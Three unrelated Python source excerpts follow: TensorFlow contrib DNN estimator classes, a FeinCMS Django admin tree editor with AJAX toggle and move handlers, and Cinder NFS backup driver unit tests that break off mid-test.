"""Returns value of the variable given by name.
Args:
name: string, name of the tensor.
Returns:
`Tensor` object.
"""
return self._estimator.get_variable_value(name)
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return self._estimator.export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=(
signature_fn or export.classification_signature_fn_with_prob),
prediction_key=prediction_key.PredictionKey.PROBABILITIES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
@experimental
def export_savedmodel(self,
export_dir_base,
input_fn,
default_output_alternative_key=None,
assets_extra=None,
as_text=False,
exports_to_keep=None):
return self._estimator.export_savedmodel(
export_dir_base,
input_fn,
default_output_alternative_key=default_output_alternative_key,
assets_extra=assets_extra,
as_text=as_text,
exports_to_keep=exports_to_keep)
@property
def model_dir(self):
return self._estimator.model_dir
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def weights_(self):
hiddenlayer_weights = [
self.get_variable_value("dnn/hiddenlayer_%d/weights" % i)
for i, _ in enumerate(self._hidden_units)
]
logits_weights = [self.get_variable_value("dnn/logits/weights")]
return hiddenlayer_weights + logits_weights
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def bias_(self):
hiddenlayer_bias = [
self.get_variable_value("dnn/hiddenlayer_%d/biases" % i)
for i, _ in enumerate(self._hidden_units)
]
logits_bias = [self.get_variable_value("dnn/logits/biases")]
if self._enable_centered_bias:
centered_bias = [self.get_variable_value(_CENTERED_BIAS_WEIGHT)]
else:
centered_bias = []
return hiddenlayer_bias + logits_bias + centered_bias
@property
def config(self):
return self._estimator.config
class DNNRegressor(evaluable.Evaluable, trainable.Trainable):
"""A regressor for TensorFlow DNN models.
Example:
```python
sparse_feature_a = sparse_column_with_hash_bucket(...)
sparse_feature_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
...)
sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
...)
estimator = DNNRegressor(
feature_columns=[sparse_feature_a, sparse_feature_b],
hidden_units=[1024, 512, 256])
# Or estimator using the ProximalAdagradOptimizer optimizer with
# regularization.
estimator = DNNRegressor(
feature_columns=[sparse_feature_a, sparse_feature_b],
hidden_units=[1024, 512, 256],
optimizer=tf.train.ProximalAdagradOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Input builders
def input_fn_train: # returns x, y
pass
estimator.fit(input_fn=input_fn_train)
def input_fn_eval: # returns x, y
pass
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self,
hidden_units,
feature_columns,
model_dir=None,
weight_column_name=None,
optimizer=None,
activation_fn=nn.relu,
dropout=None,
gradient_clip_norm=None,
enable_centered_bias=False,
config=None,
feature_engineering_fn=None,
label_dimension=1,
embedding_lr_multipliers=None):
"""Initializes a `DNNRegressor` instance.
Args:
hidden_units: List of hidden units per layer. All layers are fully
connected. Ex. `[64, 32]` means first layer has 64 nodes and second one
has 32.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Adagrad optimizer.
activation_fn: Activation function applied to each layer. If `None`, will
use `tf.nn.relu`.
dropout: When not `None`, the probability we will drop out a given
coordinate.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
label_dimension: Dimension of the label for multilabels. Defaults to 1.
embedding_lr_multipliers: Optional. A dictionary from `EbeddingColumn` to
a `float` multiplier. Multiplier will be used to multiply with
learning rate for the embedding variables.
Returns:
A `DNNRegressor` estimator.
"""
self._feature_columns = feature_columns
self._estimator = estimator.Estimator(
model_fn=_dnn_model_fn,
model_dir=model_dir,
config=config,
params={
"head": head_lib._regression_head( # pylint: disable=protected-access
label_dimension=label_dimension,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias),
"hidden_units": hidden_units,
"feature_columns": feature_columns,
"optimizer": optimizer,
"activation_fn": activation_fn,
"dropout": dropout,
"gradient_clip_norm": gradient_clip_norm,
"embedding_lr_multipliers": embedding_lr_multipliers,
},
feature_engineering_fn=feature_engineering_fn)
def fit(self, x=None, y=None, input_fn=None, steps=None, batch_size=None,
monitors=None, max_steps=None):
"""See trainable.Trainable."""
# TODO(roumposg): Remove when deprecated monitors are removed.
hooks = monitor_lib.replace_monitors_with_hooks(monitors, self)
self._estimator.fit(x=x,
y=y,
input_fn=input_fn,
steps=steps,
batch_size=batch_size,
monitors=hooks,
max_steps=max_steps)
return self
def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None,
batch_size=None, steps=None, metrics=None, name=None,
checkpoint_path=None):
"""See evaluable.Evaluable."""
# TODO(zakaria): remove once deprecation is finished (b/31229024)
custom_metrics = {}
if metrics:
for key, metric in six.iteritems(metrics):
if (not isinstance(metric, metric_spec.MetricSpec) and
not isinstance(key, tuple)):
custom_metrics[(key, prediction_key.PredictionKey.SCORES)] = metric
else:
custom_metrics[key] = metric
return self._estimator.evaluate(
x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size,
steps=steps, metrics=custom_metrics, name=name,
checkpoint_path=checkpoint_path)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=True):
"""Returns predicted scores for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted scores (or an iterable of predicted scores if
as_iterable is True). If `label_dimension == 1`, the shape of the output
is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
"""
key = prediction_key.PredictionKey.SCORES
preds = self._estimator.predict(x=x, input_fn=input_fn,
batch_size=batch_size, outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return (pred[key] for pred in preds)
return preds[key]
def _get_predict_ops(self, features):
"""See `Estimator` class."""
# This method exists to support some models that use the legacy interface.
# pylint: disable=protected-access
return self._estimator._get_predict_ops(features)
def get_variable_names(self):
"""Returns list of all variable names in this model.
Returns:
List of names.
"""
return self._estimator.get_variable_names()
def get_variable_value(self, name):
"""Returns value of the variable given by name.
Args:
name: string, name of the tensor.
Returns:
`Tensor` object.
"""
return self._estimator.get_variable_value(name)
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return self._estimator.export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=signature_fn or export.regression_signature_fn,
prediction_key=prediction_key.PredictionKey.SCORES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
@property
def model_dir(self):
return self._estimator.model_dir
@property
def config(self):
return self._estimator.config
| |
from django.conf import settings as django_settings
from django.contrib import admin
from django.contrib.admin.views import main
from django.db.models import Q
from django.db.models.query import QuerySet
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound, HttpResponseServerError
from django.utils import simplejson
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from mptt.exceptions import InvalidMove
from feincms import settings
import logging
# ------------------------------------------------------------------------
def django_boolean_icon(field_val, alt_text=None, title=None):
"""
Return HTML code for a nice representation of true/false.
"""
# Origin: contrib/admin/templatetags/admin_list.py
BOOLEAN_MAPPING = { True: 'yes', False: 'no', None: 'unknown' }
alt_text = alt_text or BOOLEAN_MAPPING[field_val]
if title is not None:
title = 'title="%s" ' % title
else:
title = ''
return mark_safe(u'<img src="%simg/admin/icon-%s.gif" alt="%s" %s/>' %
(django_settings.ADMIN_MEDIA_PREFIX, BOOLEAN_MAPPING[field_val], alt_text, title))
def _build_tree_structure(cls):
"""
Build an in-memory representation of the item tree, trying to keep
database accesses down to a minimum. The returned dictionary looks like
this (as json dump):
{"6": [7, 8, 10]
"7": [12],
"8": [],
...
}
"""
all_nodes = { }
for p_id, parent_id in cls.objects.order_by(cls._meta.tree_id_attr, cls._meta.left_attr).values_list("pk", "%s_id" % cls._meta.parent_attr):
all_nodes[p_id] = []
if parent_id:
if not all_nodes.has_key(parent_id):
# This happens very rarely, but protect against parents that
# we have yet to iteratove over.
all_nodes[parent_id] = []
all_nodes[parent_id].append(p_id)
return all_nodes
# ------------------------------------------------------------------------
def ajax_editable_boolean_cell(item, attr, text='', override=None):
"""
Generate a html snippet for showing a boolean value on the admin page.
Item is an object, attr is the attribute name we should display. Text
is an optional explanatory text to be included in the output.
This function will emit code to produce a checkbox input with its state
corresponding to the item.attr attribute if no override value is passed.
This input is wired to run a JS ajax updater to toggle the value.
If override is passed in, ignores the attr attribute and returns a
static image for the override boolean with no user interaction possible
(useful for "disabled and you can't change it" situations).
"""
if text:
text = ' (%s)' % unicode(text)
if override is not None:
a = [ django_boolean_icon(override, text), text ]
else:
value = getattr(item, attr)
a = [
'<input type="checkbox"',
value and ' checked="checked"' or '',
' onclick="return inplace_toggle_boolean(%d, \'%s\')";' % (item.id, attr),
' />',
text,
]
a.insert(0, '<div id="wrap_%s_%d">' % ( attr, item.id ))
a.append('</div>')
#print a
return unicode(''.join(a))
# ------------------------------------------------------------------------
def ajax_editable_boolean(attr, short_description):
"""
Convenience function: Assign the return value of this method to a variable
of your ModelAdmin class and put the variable name into list_display.
Example::
class MyTreeEditor(TreeEditor):
list_display = ('__unicode__', 'active_toggle')
active_toggle = ajax_editable_boolean('active', _('is active'))
"""
def _fn(self, item):
return ajax_editable_boolean_cell(item, attr)
_fn.allow_tags = True
_fn.short_description = short_description
_fn.editable_boolean_field = attr
return _fn
class ChangeList(main.ChangeList):
"""
Custom ``ChangeList`` class which ensures that the tree entries are always
ordered in depth-first order (order by ``tree_id``, ``lft``).
"""
def get_query_set(self):
return super(ChangeList, self).get_query_set().order_by('tree_id', 'lft')
def get_results(self, request):
if settings.FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS:
clauses = [Q(
tree_id=tree_id,
lft__lte=lft,
rght__gte=rght,
) for lft, rght, tree_id in \
self.query_set.values_list('lft', 'rght', 'tree_id')]
if clauses:
self.query_set = self.model._default_manager.filter(reduce(lambda p, q: p|q, clauses))
return super(ChangeList, self).get_results(request)
# ------------------------------------------------------------------------
# MARK: -
# ------------------------------------------------------------------------
class TreeEditor(admin.ModelAdmin):
"""
The ``TreeEditor`` modifies the standard Django administration change list
to a drag-drop enabled interface for django-mptt_-managed Django models.
.. _django-mptt: http://github.com/mptt/django-mptt/
"""
if settings.FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS:
# Make sure that no pagination is displayed. Slicing is disabled anyway,
# therefore this value does not have an influence on the queryset
list_per_page = 999999999
def __init__(self, *args, **kwargs):
super(TreeEditor, self).__init__(*args, **kwargs)
self.list_display = list(self.list_display)
if 'indented_short_title' not in self.list_display:
if self.list_display[0] == 'action_checkbox':
self.list_display[1] = 'indented_short_title'
else:
self.list_display[0] = 'indented_short_title'
self.list_display_links = ('indented_short_title',)
opts = self.model._meta
self.change_list_template = [
'admin/feincms/%s/%s/tree_editor.html' % (opts.app_label, opts.object_name.lower()),
'admin/feincms/%s/tree_editor.html' % opts.app_label,
'admin/feincms/tree_editor.html',
]
def indented_short_title(self, item):
"""
Generate a short title for a page, indent it depending on
the page's depth in the hierarchy.
"""
if hasattr(item, 'get_absolute_url'):
r = '''<input type="hidden" class="medialibrary_file_path" value="%s" /><span id="page_marker-%d"
class="page_marker" style="width: %dpx;"> </span> ''' % (
item.get_absolute_url(), item.id, 14+item.level*18)
else:
r = '''<span id="page_marker-%d"
class="page_marker" style="width: %dpx;"> </span> ''' % (
item.id, 14+item.level*18)
# r += '<span tabindex="0">'
if hasattr(item, 'short_title'):
r += item.short_title()
else:
r += unicode(item)
# r += '</span>'
return mark_safe(r)
indented_short_title.short_description = _('title')
indented_short_title.allow_tags = True
def _collect_editable_booleans(self):
"""
Collect all fields marked as editable booleans. We do not
want the user to be able to edit arbitrary fields by crafting
an AJAX request by hand.
"""
if hasattr(self, '_ajax_editable_booleans'):
return
self._ajax_editable_booleans = {}
for field in self.list_display:
# The ajax_editable_boolean return value has to be assigned
# to the ModelAdmin class
item = getattr(self.__class__, field, None)
if not item:
continue
attr = getattr(item, 'editable_boolean_field', None)
if attr:
def _fn(self, page):
return [ ajax_editable_boolean_cell(page, _fn.attr) ]
_fn.attr = attr
result_func = getattr(item, 'editable_boolean_result', _fn)
self._ajax_editable_booleans[attr] = result_func
def _refresh_changelist_caches(self):
"""
Refresh information used to show the changelist tree structure such as
inherited active/inactive states etc.
XXX: This is somewhat hacky, but since it's an internal method, so be it.
"""
pass
def _toggle_boolean(self, request):
"""
Handle an AJAX toggle_boolean request
"""
try:
item_id = int(request.POST.get('item_id', None))
attr = str(request.POST.get('attr', None))
except:
return HttpResponseBadRequest("Malformed request")
if not request.user.is_staff:
logging.warning("Denied AJAX request by non-staff %s to toggle boolean %s for page #%s", request.user, attr, item_id)
return HttpResponseForbidden("You do not have permission to access this page")
self._collect_editable_booleans()
if not self._ajax_editable_booleans.has_key(attr):
return HttpResponseBadRequest("not a valid attribute %s" % attr)
try:
obj = self.model._default_manager.get(pk=item_id)
except self.model.DoesNotExist:
return HttpResponseNotFound("Object does not exist")
can_change = False
if hasattr(obj, "user_can") and obj.user_can(request.user, change_page=True):
can_change = True
else:
can_change = request.user.has_perm("page.change_page")
if not can_change:
logging.warning("Denied AJAX request by %s to toggle boolean %s for page %s", request.user, attr, item_id)
return HttpResponseForbidden("You do not have permission to access this page")
logging.info("Processing request by %s to toggle %s on %s", request.user, attr, obj)
try:
before_data = self._ajax_editable_booleans[attr](self, obj)
setattr(obj, attr, not getattr(obj, attr))
obj.save()
self._refresh_changelist_caches() # ???: Perhaps better a post_save signal?
# Construct html snippets to send back to client for status update
data = self._ajax_editable_booleans[attr](self, obj)
except Exception, e:
logging.exception("Unhandled exception while toggling %s on %s", attr, obj)
return HttpResponseServerError("Unable to toggle %s on %s" % (attr, obj))
# Weed out unchanged cells to keep the updates small. This assumes
# that the order a possible get_descendents() returns does not change
# before and after toggling this attribute. Unlikely, but still...
d = []
for a, b in zip(before_data, data):
if a != b:
d.append(b)
return HttpResponse(simplejson.dumps(d), mimetype="application/json")
def get_changelist(self, request, **kwargs):
return ChangeList
def changelist_view(self, request, extra_context=None, *args, **kwargs):
"""
Handle the changelist view, the django view for the model instances
change list/actions page.
"""
if 'actions_column' not in self.list_display:
self.list_display.append('actions_column')
# handle common AJAX requests
if request.is_ajax():
cmd = request.POST.get('__cmd')
if cmd == 'toggle_boolean':
return self._toggle_boolean(request)
elif cmd == 'move_node':
return self._move_node(request)
else:
return HttpResponseBadRequest('Oops. AJAX request not understood.')
self._refresh_changelist_caches()
extra_context = extra_context or {}
extra_context['FEINCMS_ADMIN_MEDIA'] = settings.FEINCMS_ADMIN_MEDIA
extra_context['FEINCMS_ADMIN_MEDIA_HOTLINKING'] = settings.FEINCMS_ADMIN_MEDIA_HOTLINKING
extra_context['tree_structure'] = mark_safe(simplejson.dumps(
_build_tree_structure(self.model)))
return super(TreeEditor, self).changelist_view(request, extra_context, *args, **kwargs)
def _move_node(self, request):
cut_item = self.model._tree_manager.get(pk=request.POST.get('cut_item'))
pasted_on = self.model._tree_manager.get(pk=request.POST.get('pasted_on'))
position = request.POST.get('position')
if position in ('last-child', 'left'):
try:
self.model._tree_manager.move_node(cut_item, pasted_on, position)
except InvalidMove, e:
self.message_user(request, unicode(e))
return HttpResponse('FAIL')
# Ensure that model save has been run
cut_item = self.model._tree_manager.get(pk=cut_item.pk)
cut_item.save()
self.message_user(request, ugettext('%s has been moved to a new position.') %
cut_item)
return HttpResponse('OK')
self.message_user(request, ugettext('Did not understand moving instruction.'))
return HttpResponse('FAIL')
def _actions_column(self, page):
return []
def actions_column(self, page):
return u' '.join(self._actions_column(page))
actions_column.allow_tags = True
actions_column.short_description = _('actions')
| |
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Backup NFS driver.
"""
import bz2
import filecmp
import hashlib
import os
import shutil
import tempfile
import zlib
import mock
from os_brick.remotefs import remotefs as remotefs_brick
from oslo_config import cfg
from cinder.backup.drivers import nfs
from cinder import context
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder import test
from cinder import utils
CONF = cfg.CONF
FAKE_BACKUP_MOUNT_POINT_BASE = '/fake/mount-point-base'
FAKE_HOST = 'fake_host'
FAKE_EXPORT_PATH = 'fake/export/path'
FAKE_BACKUP_SHARE = '%s:/%s' % (FAKE_HOST, FAKE_EXPORT_PATH)
FAKE_BACKUP_PATH = os.path.join(FAKE_BACKUP_MOUNT_POINT_BASE,
FAKE_EXPORT_PATH)
FAKE_BACKUP_ID_PART1 = 'de'
FAKE_BACKUP_ID_PART2 = 'ad'
FAKE_BACKUP_ID_REST = 'beef-whatever'
FAKE_BACKUP_ID = (FAKE_BACKUP_ID_PART1 + FAKE_BACKUP_ID_PART2 +
FAKE_BACKUP_ID_REST)
UPDATED_CONTAINER_NAME = os.path.join(FAKE_BACKUP_ID_PART1,
FAKE_BACKUP_ID_PART2,
FAKE_BACKUP_ID)
class BackupNFSShareTestCase(test.TestCase):
def setUp(self):
super(BackupNFSShareTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.mock_object(nfs, 'LOG')
def test_check_configuration_no_backup_share(self):
self.override_config('backup_share', None)
self.mock_object(nfs.NFSBackupDriver, '_init_backup_repo_path',
mock.Mock(return_value=FAKE_BACKUP_PATH))
with mock.patch.object(nfs.NFSBackupDriver, '_check_configuration'):
driver = nfs.NFSBackupDriver(self.ctxt)
self.assertRaises(exception.ConfigNotFound,
driver._check_configuration)
def test_init_backup_repo_path(self):
self.override_config('backup_share', FAKE_BACKUP_SHARE)
self.override_config('backup_mount_point_base',
FAKE_BACKUP_MOUNT_POINT_BASE)
mock_remotefsclient = mock.Mock()
mock_remotefsclient.get_mount_point = mock.Mock(
return_value=FAKE_BACKUP_PATH)
self.mock_object(nfs.NFSBackupDriver, '_check_configuration')
self.mock_object(remotefs_brick, 'RemoteFsClient',
mock.Mock(return_value=mock_remotefsclient))
self.mock_object(utils, 'get_root_helper')
with mock.patch.object(nfs.NFSBackupDriver, '_init_backup_repo_path'):
driver = nfs.NFSBackupDriver(self.ctxt)
path = driver._init_backup_repo_path()
self.assertEqual(FAKE_BACKUP_PATH, path)
utils.get_root_helper.called_once()
mock_remotefsclient.mount.assert_called_once_with(FAKE_BACKUP_SHARE)
mock_remotefsclient.get_mount_point.assert_called_once_with(
FAKE_BACKUP_SHARE)
def fake_md5(arg):
class result(object):
def hexdigest(self):
return 'fake-md5-sum'
ret = result()
return ret
class BackupNFSSwiftBasedTestCase(test.TestCase):
"""Test Cases for based on Swift tempest backup tests."""
_DEFAULT_VOLUME_ID = '8d31c3aa-c5fa-467d-8819-8888887225b6'
def _create_volume_db_entry(self, volume_id=_DEFAULT_VOLUME_ID):
vol = {'id': volume_id,
'size': 1,
'status': 'available'}
return db.volume_create(self.ctxt, vol)['id']
def _create_backup_db_entry(self,
volume_id=_DEFAULT_VOLUME_ID,
container='test-container',
backup_id=123,
parent_id=None):
try:
db.volume_get(self.ctxt, volume_id)
except exception.NotFound:
self._create_volume_db_entry(volume_id=volume_id)
backup = {'id': backup_id,
'size': 1,
'container': container,
'volume_id': volume_id,
'parent_id': parent_id,
'user_id': 'user-id',
'project_id': 'project-id',
}
return db.backup_create(self.ctxt, backup)['id']
def setUp(self):
super(BackupNFSSwiftBasedTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.stubs.Set(hashlib, 'md5', fake_md5)
self.volume_file = tempfile.NamedTemporaryFile()
self.temp_dir = tempfile.mkdtemp()
self.addCleanup(self.volume_file.close)
self.override_config('backup_share', FAKE_BACKUP_SHARE)
self.override_config('backup_mount_point_base',
'/tmp')
self.override_config('backup_file_size', 52428800)
mock_remotefsclient = mock.Mock()
mock_remotefsclient.get_mount_point = mock.Mock(
return_value=self.temp_dir)
self.mock_object(remotefs_brick, 'RemoteFsClient',
mock.Mock(return_value=mock_remotefsclient))
# Remove tempdir.
self.addCleanup(shutil.rmtree, self.temp_dir)
for _i in range(0, 32):
self.volume_file.write(os.urandom(1024))
def test_backup_uncompressed(self):
volume_id = '0adffe69-ce32-4bb0-b5e6-0000002d748d'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='none')
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
def test_backup_bz2(self):
volume_id = '057a035f-2584-4cfd-bf23-000000e39288'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='bz2')
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
def test_backup_zlib(self):
volume_id = '3701a9f8-effd-44b9-bf2e-000000bb99ca'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='zlib')
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
def test_backup_default_container(self):
volume_id = 'caffdc68-ef65-48af-928d-000000289076'
self._create_backup_db_entry(volume_id=volume_id,
container=None,
backup_id=FAKE_BACKUP_ID)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, FAKE_BACKUP_ID)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, FAKE_BACKUP_ID)
self.assertEqual(backup['container'], UPDATED_CONTAINER_NAME)
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_send_progress_end')
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_send_progress_notification')
def test_backup_default_container_notify(self, _send_progress,
_send_progress_end):
volume_id = '170a1081-9fe2-4add-9094-000000b48877'
self._create_backup_db_entry(volume_id=volume_id,
container=None)
# If the backup_object_number_per_notification is set to 1,
# the _send_progress method will be called for sure.
CONF.set_override("backup_object_number_per_notification", 1)
CONF.set_override("backup_enable_progress_timer", False)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
self.assertTrue(_send_progress.called)
self.assertTrue(_send_progress_end.called)
# If the backup_object_number_per_notification is increased to
# another value, the _send_progress method will not be called.
_send_progress.reset_mock()
_send_progress_end.reset_mock()
CONF.set_override("backup_object_number_per_notification", 10)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
self.assertFalse(_send_progress.called)
self.assertTrue(_send_progress_end.called)
# If the timer is enabled, the _send_progress will be called,
# since the timer can trigger the progress notification.
_send_progress.reset_mock()
_send_progress_end.reset_mock()
CONF.set_override("backup_object_number_per_notification", 10)
CONF.set_override("backup_enable_progress_timer", True)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
self.assertTrue(_send_progress.called)
self.assertTrue(_send_progress_end.called)
def test_backup_custom_container(self):
volume_id = '449b8140-85b6-465e-bdf6-0000002b29c4'
container_name = 'fake99'
self._create_backup_db_entry(volume_id=volume_id,
container=container_name)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, 123)
self.assertEqual(backup['container'], container_name)
def test_backup_shafile(self):
volume_id = '1eb6325f-6666-43a2-bcdd-0000001d8dac'
def _fake_generate_object_name_prefix(self, backup):
az = 'az_fake'
backup_name = '%s_backup_%s' % (az, backup['id'])
volume = 'volume_%s' % (backup['volume_id'])
prefix = volume + '_' + backup_name
return prefix
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver,
'_generate_object_name_prefix',
_fake_generate_object_name_prefix)
container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
'', 1)
self._create_backup_db_entry(volume_id=volume_id,
container=container_name)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, 123)
self.assertEqual(backup['container'], container_name)
# Verify sha contents
content1 = service._read_sha256file(backup)
self.assertEqual(32 * 1024 / content1['chunk_size'],
len(content1['sha256s']))
def test_backup_cmp_shafiles(self):
volume_id = '261e8c1a-0c07-41d7-923f-000000d3efb8'
def _fake_generate_object_name_prefix(self, backup):
az = 'az_fake'
backup_name = '%s_backup_%s' % (az, backup['id'])
volume = 'volume_%s' % (backup['volume_id'])
prefix = volume + '_' + backup_name
return prefix
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver,
'_generate_object_name_prefix',
_fake_generate_object_name_prefix)
container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
'', 1)
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, 123)
self.assertEqual(backup['container'], container_name)
# Create incremental backup with no change to contents
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=124,
parent_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
service.backup(deltabackup, self.volume_file)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
self.assertEqual(deltabackup['container'], container_name)
# Compare shas from both files
content1 = service._read_sha256file(backup)
content2 = service._read_sha256file(deltabackup)
self.assertEqual(len(content1['sha256s']), len(content2['sha256s']))
self.assertEqual(set(content1['sha256s']), set(content2['sha256s']))
def test_backup_delta_two_objects_change(self):
volume_id = '3f400215-e346-406c-83b0-0000009ac4fa'
def _fake_generate_object_name_prefix(self, backup):
az = 'az_fake'
backup_name = '%s_backup_%s' % (az, backup['id'])
volume = 'volume_%s' % (backup['volume_id'])
prefix = volume + '_' + backup_name
return prefix
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver,
'_generate_object_name_prefix',
_fake_generate_object_name_prefix)
self.flags(backup_file_size=(8 * 1024))
self.flags(backup_sha_block_size_bytes=1024)
container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
'', 1)
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, 123)
self.assertEqual(backup['container'], container_name)
# Create incremental backup with no change to contents
self.volume_file.seek(16 * 1024)
self.volume_file.write(os.urandom(1024))
self.volume_file.seek(20 * 1024)
self.volume_file.write(os.urandom(1024))
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=124,
parent_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
